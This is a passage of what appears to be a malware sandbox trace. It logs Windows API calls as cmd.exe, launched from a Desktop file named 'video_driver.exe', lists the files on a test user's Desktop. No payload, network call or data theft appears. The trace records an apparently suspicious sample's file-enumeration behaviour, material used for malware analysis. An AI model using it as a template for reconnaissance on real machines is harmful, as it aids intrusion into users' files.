Size=0xb36) returned 0x682cb0 [0057.249] FreeEnvironmentStringsW (penv=0x682170) returned 1 [0057.249] GetProcessHeap () returned 0x670000 [0057.249] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4) returned 0x681860 [0057.249] GetEnvironmentStringsW () returned 0x682170* [0057.249] GetProcessHeap () returned 0x670000 [0057.249] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xb36) returned 0x6837f0 [0057.250] FreeEnvironmentStringsW (penv=0x682170) returned 1 [0057.250] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e74c | out: phkResult=0x20e74c*=0x68) returned 0x0 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x0, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x4) returned 0x0 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x0, lpcbData=0x20e750*=0x4) returned 0x0 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x4) returned 0x0 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x4) returned 0x0 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.250] RegCloseKey (hKey=0x68) returned 0x0 [0057.250] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e74c | out: phkResult=0x20e74c*=0x68) returned 0x0 [0057.250] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.251] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x4) returned 0x0 [0057.251] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.251] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x0, lpcbData=0x20e750*=0x4) returned 0x0 [0057.251] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x9, lpcbData=0x20e750*=0x4) returned 0x0 [0057.251] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x9, lpcbData=0x20e750*=0x4) returned 0x0 [0057.251] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x9, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.251] RegCloseKey (hKey=0x68) returned 0x0 [0057.251] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b65 [0057.251] srand (_Seed=0x5eb34b65) [0057.251] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c dir /b \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*\"" [0057.251] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c dir /b \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*\"" [0057.251] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.251] GetProcessHeap () returned 0x670000 [0057.251] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x210) returned 0x682170 [0057.251] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x682178, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0057.252] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.252] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.252] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0057.252] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.252] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.252] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0057.252] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.252] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.252] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.252] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.252] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.252] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.252] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.252] GetProcessHeap () returned 0x670000 [0057.252] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x682388 [0057.252] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f518 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.252] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x20f518, lpFilePart=0x20f514 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x20f514*="Desktop") returned 0x25 [0057.252] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.253] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f294 | out: lpFindFileData=0x20f294*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x681ff0 [0057.253] FindClose (in: hFindFile=0x681ff0 | out: hFindFile=0x681ff0) returned 1 [0057.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x20f294 | out: lpFindFileData=0x20f294*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x681ff0 [0057.253] FindClose (in: hFindFile=0x681ff0 | out: hFindFile=0x681ff0) returned 1 [0057.253] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0057.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x20f294 | out: lpFindFileData=0x20f294*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x681ff0 [0057.253] FindClose (in: hFindFile=0x681ff0 | out: hFindFile=0x681ff0) returned 1 [0057.254] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.254] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0057.254] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0057.254] GetProcessHeap () returned 0x670000 [0057.254] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x682cb0 | out: hHeap=0x670000) returned 1 [0057.254] GetEnvironmentStringsW () returned 0x682be8* [0057.254] GetProcessHeap () returned 0x670000 [0057.254] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xb36) returned 0x684330 [0057.254] FreeEnvironmentStringsW (penv=0x682be8) returned 1 [0057.254] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.254] GetProcessHeap () returned 0x670000 [0057.254] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x682388 | out: hHeap=0x670000) returned 1 [0057.254] GetProcessHeap () returned 0x670000 [0057.254] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400e) returned 0x684e70 [0057.255] GetProcessHeap () returned 0x670000 [0057.255] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x72) returned 0x688ea0 [0057.255] GetProcessHeap () returned 0x670000 [0057.255] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x684e70 | out: hHeap=0x670000) returned 1 [0057.255] GetConsoleOutputCP () returned 0x1b5 [0057.255] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.255] GetUserDefaultLCID () returned 0x409 [0057.256] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0057.256] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f658, cchData=128 | out: lpLCData="0") returned 2 [0057.256] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f658, cchData=128 | out: lpLCData="0") returned 2 [0057.256] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f658, cchData=128 | out: lpLCData="1") returned 2 [0057.256] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0057.256] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0057.257] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0057.257] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.258] GetProcessHeap () returned 0x670000 [0057.258] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20c) returned 0x682be8 [0057.258] GetConsoleTitleW (in: lpConsoleTitle=0x682be8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.259] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.259] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0057.259] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0057.259] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0057.260] GetProcessHeap () returned 0x670000 [0057.260] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400a) returned 0x684e70 [0057.260] GetProcessHeap () returned 0x670000 [0057.260] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x684e70 | out: hHeap=0x670000) returned 1 [0057.260] _wcsicmp (_String1="dir", _String2=")") returned 59 [0057.260] _wcsicmp (_String1="FOR", _String2="dir") returned 2 [0057.260] _wcsicmp (_String1="FOR/?", _String2="dir") returned 2 [0057.260] _wcsicmp (_String1="IF", _String2="dir") returned 5 [0057.260] _wcsicmp (_String1="IF/?", _String2="dir") returned 5 [0057.260] _wcsicmp (_String1="REM", _String2="dir") returned 14 [0057.260] _wcsicmp (_String1="REM/?", _String2="dir") returned 14 [0057.260] GetProcessHeap () returned 0x670000 [0057.260] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x58) returned 0x682388 [0057.260] GetProcessHeap () returned 0x670000 [0057.260] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x10) returned 0x680030 [0057.262] GetProcessHeap () returned 0x670000 [0057.262] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x68) returned 0x682e00 [0057.263] GetConsoleTitleW (in: lpConsoleTitle=0x20f350, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.264] _wcsicmp (_String1="dir", _String2="DIR") returned 0 [0057.264] GetProcessHeap () returned 0x670000 [0057.264] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xc8) returned 0x682e70 [0057.264] GetProcessHeap () returned 0x670000 [0057.264] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x682e70, Size=0x6a) returned 0x682e70 [0057.264] GetProcessHeap () returned 0x670000 [0057.264] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x682e70) returned 0x6a [0057.265] GetProcessHeap () returned 0x670000 [0057.265] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x70) returned 0x682ee8 [0057.266] GetEnvironmentVariableW (in: lpName="DIRCMD", lpBuffer=0x20eefc, nSize=0x106 | out: lpBuffer="") returned 0x0 [0057.266] GetProcessHeap () returned 0x670000 [0057.266] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xc8) returned 0x682f60 [0057.266] GetProcessHeap () returned 0x670000 [0057.266] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x682f60, Size=0x6a) returned 0x682f60 [0057.266] GetProcessHeap () returned 0x670000 [0057.266] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x682f60) returned 0x6a [0057.266] GetProcessHeap () returned 0x670000 [0057.266] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x5c) returned 0x682fd8 [0057.266] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x20f108 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.266] GetProcessHeap () returned 0x670000 [0057.267] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x34) returned 0x683040 [0057.267] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.267] GetFileType (hFile=0x80) returned 0x3 [0057.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x0, lpConsoleScreenBufferInfo=0x20e5f4 | out: lpConsoleScreenBufferInfo=0x20e5f4) returned 0 [0057.267] GetProcessHeap () returned 0x670000 [0057.267] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400c) returned 0x684e70 [0057.267] GetProcessHeap () returned 0x670000 [0057.267] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x38) returned 0x683080 [0057.267] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x20d954 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.267] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x20db84, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x20db88, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x20db84*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0057.268] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0057.268] GetProcessHeap () returned 0x670000 [0057.268] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x214) returned 0x6830c0 [0057.268] GetProcessHeap () returned 0x670000 [0057.268] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x682fd8 | out: hHeap=0x670000) returned 1 [0057.268] GetProcessHeap () returned 0x670000 [0057.268] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2c) returned 0x682fd8 [0057.268] GetProcessHeap () returned 0x670000 [0057.268] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x258) returned 0x6832e0 [0057.268] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0057.268] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0057.268] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\*.*")) returned 0xffffffff [0057.268] GetLastError () returned 0x7b [0057.268] GetProcessHeap () returned 0x670000 [0057.268] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x210) returned 0x683540 [0057.268] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x683548 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.268] SetErrorMode (uMode=0x0) returned 0x0 [0057.268] SetErrorMode (uMode=0x1) returned 0x0 [0057.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", nBufferLength=0x104, lpBuffer=0x20dfa8, lpFilePart=0x20df90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFilePart=0x20df90*="*.*") returned 0x29 [0057.268] SetErrorMode (uMode=0x0) returned 0x1 [0057.269] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.269] GetProcessHeap () returned 0x670000 [0057.269] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x258) returned 0x68ae88 [0057.269] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0057.269] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0057.269] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\*.*")) returned 0xffffffff [0057.269] GetLastError () returned 0x7b [0057.269] GetProcessHeap () returned 0x670000 [0057.269] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x10) returned 0x680048 [0057.269] GetProcessHeap () returned 0x670000 [0057.269] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x683758 [0057.269] GetProcessHeap () returned 0x670000 [0057.269] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x68b0e8 [0057.269] GetProcessHeap () returned 0x670000 [0057.269] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x808) returned 0x68b148 [0057.269] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", fInfoLevelId=0x1, lpFindFileData=0x68b154, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x68b154) returned 0x68b958 [0057.269] GetProcessHeap () returned 0x670000 [0057.269] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x14) returned 0x683010 [0057.270] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.271] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ca2c40, ftCreationTime.dwHighDateTime=0x1d5db7f, ftLastAccessTime.dwLowDateTime=0xe3634a00, ftLastAccessTime.dwHighDateTime=0x1d5d94a, ftLastWriteTime.dwLowDateTime=0xe3634a00, ftLastWriteTime.dwHighDateTime=0x1d5d94a, nFileSizeHigh=0x0, nFileSizeLow=0xfe40, dwReserved0=0x0, dwReserved1=0x0, cFileName="47Upt ff5iyL.avi", cAlternateFileName="")) returned 1 [0057.271] GetProcessHeap () returned 0x670000 [0057.271] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x50) returned 0x69b9a0 [0057.271] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x23, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="47Upt ff5iyL.avi") returned 16 [0057.271] GetProcessHeap () returned 0x670000 [0057.271] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.271] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.271] GetFileType (hFile=0x80) returned 0x3 [0057.271] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.271] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="47Upt ff5iyL.avi", lpUsedDefaultChar=0x0) returned 17 [0057.272] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x10, lpOverlapped=0x0) returned 1 [0057.272] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.272] GetFileType (hFile=0x80) returned 0x3 [0057.272] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.272] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.272] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.273] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83122110, ftCreationTime.dwHighDateTime=0x1d5e577, ftLastAccessTime.dwLowDateTime=0xe28d7e90, ftLastAccessTime.dwHighDateTime=0x1d5dcdb, ftLastWriteTime.dwLowDateTime=0xe28d7e90, ftLastWriteTime.dwHighDateTime=0x1d5dcdb, nFileSizeHigh=0x0, nFileSizeLow=0x5853, dwReserved0=0x0, dwReserved1=0x0, cFileName="8v1Sb42C0-_SO.xls", cAlternateFileName="")) returned 1 [0057.273] GetProcessHeap () returned 0x670000 [0057.273] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x52) returned 0x69b9a0 [0057.273] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x24, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="8v1Sb42C0-_SO.xls") returned 17 [0057.273] GetProcessHeap () returned 0x670000 [0057.273] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.273] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.273] GetFileType (hFile=0x80) returned 0x3 [0057.273] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.273] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="8v1Sb42C0-_SO.xls", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8v1Sb42C0-_SO.xls", lpUsedDefaultChar=0x0) returned 18 [0057.273] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x11, lpOverlapped=0x0) returned 1 [0057.273] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.273] GetFileType (hFile=0x80) returned 0x3 [0057.273] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.273] 